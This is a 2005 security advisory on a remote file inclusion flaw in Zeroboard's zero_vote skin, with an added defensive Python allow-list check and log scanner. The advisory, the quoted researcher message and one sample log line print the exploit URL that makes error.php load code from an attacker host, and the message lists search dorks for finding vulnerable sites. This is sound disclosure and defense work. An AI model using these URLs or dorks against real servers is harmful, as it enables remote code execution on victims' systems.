Zeroboard 'zero_vote' Include File Bug Lets Remote Users Execute Arbitrary Commands

SecurityTracker Alert ID: 1012812
SecurityTracker URL: http://securitytracker.com/id/1012812

CVE Reference:
GENERIC-MAP-NOMATCH

Updated: Jan 13 2005
Original Entry Date: Jan 9 2005

Impact:
Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Description:
Optik4Lab reported an input validation vulnerability in Zeroboard in the zero_vote theme. A remote user can execute arbitrary commands on the target system.
The 'error.php' script does not properly validate user-supplied input in the 'dir' parameter. A remote user can supply a specially crafted URL to cause arbitrary PHP code from a remote location to be included and executed on the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.
http://[target]/zeroboard/skin/zero_vote/error.php?dir=http://[attacker]
Aleks is credited with discovering this flaw.
The original advisory is available at:
http://www.optik4lab.com/modules/news/article.php?storyid=13
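The advisory describes the defect but shows neither Zeroboard's code nor a fix. The following added example (not code from the original advisory or from the Zeroboard project) shows the two things a defender wants here: the allow-list check that a hardened error.php should apply to the 'dir' value before handing it to include(), written in Python so it can be run stand-alone, and the same rule applied to web-server access log lines to find requests matching the remote-inclusion pattern quoted above. The skin names in ALLOWED_SKIN_DIRS, the log lines, the IP addresses and the function names are assumptions; the page does not list Zeroboard's real skin directories.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allow-list of skin directory names that a hardened error.php
# could accept for 'dir'. Hypothetical: Zeroboard's real skin names are not
# given on the page.
ALLOWED_SKIN_DIRS = frozenset({"zero_vote", "default", "simple"})

# A safe 'dir' value is one bare path component. Anything outside this
# character class (':' and '/' of a URL scheme, '.' of '..', '%' of an
# encoded variant, NUL) fails the check before the allow-list is consulted.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")

# Script path named in the advisory; only requests ending in it are examined.
TARGET_SCRIPT = "/skin/zero_vote/error.php"

# Apache/NCSA combined log format: client IP, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def is_safe_dir(value, allowed=ALLOWED_SKIN_DIRS):
    """Return True only if 'value' is a bare directory name on the allow-list.

    This is the rule the vulnerable script lacks: a value such as
    'http://[attacker]' never reaches include() because it is neither a
    single path component nor an allow-listed name.
    """
    if not SAFE_NAME.fullmatch(value):
        return False
    return value in allowed


def find_rfi_attempts(log_lines):
    """Scan access-log lines for requests to the vulnerable script whose
    'dir' parameter fails is_safe_dir(). Returns a list of dicts describing
    each flagged request in log order."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(TARGET_SCRIPT):
            continue
        # parse_qs URL-decodes values, so 'dir=http%3A%2F%2F...' is seen as
        # 'http://...' and rejected like the plain form.
        for value in parse_qs(parts.query, keep_blank_values=True).get("dir", []):
            if not is_safe_dir(value):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": int(m.group("status")),
                    "dir": value,
                })
    return hits


# Constructed sample log lines (not from any real server).
SAMPLE_LOG = [
    # Benign: 'dir' is an allow-listed skin name.
    '203.0.113.5 - - [09/Jan/2005:12:00:01 +0000] "GET /zeroboard/skin/zero_vote/error.php?dir=zero_vote HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    # The inclusion pattern from the advisory: 'dir' names a remote host.
    '198.51.100.7 - - [09/Jan/2005:12:00:02 +0000] "GET /zeroboard/skin/zero_vote/error.php?dir=http://198.51.100.7/x HTTP/1.1" 200 1024 "-" "curl/7.10"',
    # Malformed: empty 'dir' is also outside the allow-list and gets flagged.
    '198.51.100.7 - - [09/Jan/2005:12:00:03 +0000] "GET /zeroboard/skin/zero_vote/error.php?dir= HTTP/1.1" 200 880 "-" "curl/7.10"',
    # Unrelated script: ignored.
    '192.0.2.9 - - [09/Jan/2005:12:00:04 +0000] "GET /zeroboard/zboard.php?id=notice HTTP/1.1" 200 3210 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} status={hit['status']} dir={hit['dir']!r}")
```

The allow-list is deliberately stricter than "reject URLs": a deny-list that only looks for `http://` would miss other inclusion wrappers and encodings, whereas a single-component, allow-listed name leaves include() nothing to resolve outside the skin directory. The same is_safe_dir() rule serves both as the validation a patched error.php needs and as the detection predicate over logs, so the two cannot drift apart.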

Impact:
A remote user can execute arbitrary PHP code, including operating system commands, on the target system with the privileges of the target web service.

Solution:
No solution was available at the time of this entry.

Vendor URL: www.nzeo.com/?channel=zeroboard

Cause:
Access control error, Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Message History:
None.

Source Message Contents

Subject: New Vulnerability

Zero_vote:
A theme present in Zeroboard has a flaw in the following file:
Theme For ZEROBOARD
/skin/zero_vote/error.php
/skin/zero_vote/error.php?dir=http://[ATTACKER]
allinurl:/skin/zero_vote/error.php
allinurl:/zero_vote/error.php
http://www.exemplo.com/zeroboard/skin/zero_vote/error.php?dir=http://[ATTACKER]
Site:
http://www.optik4lab.com/modules/news/article.php?storyid=13
View this please,
Optik4Lab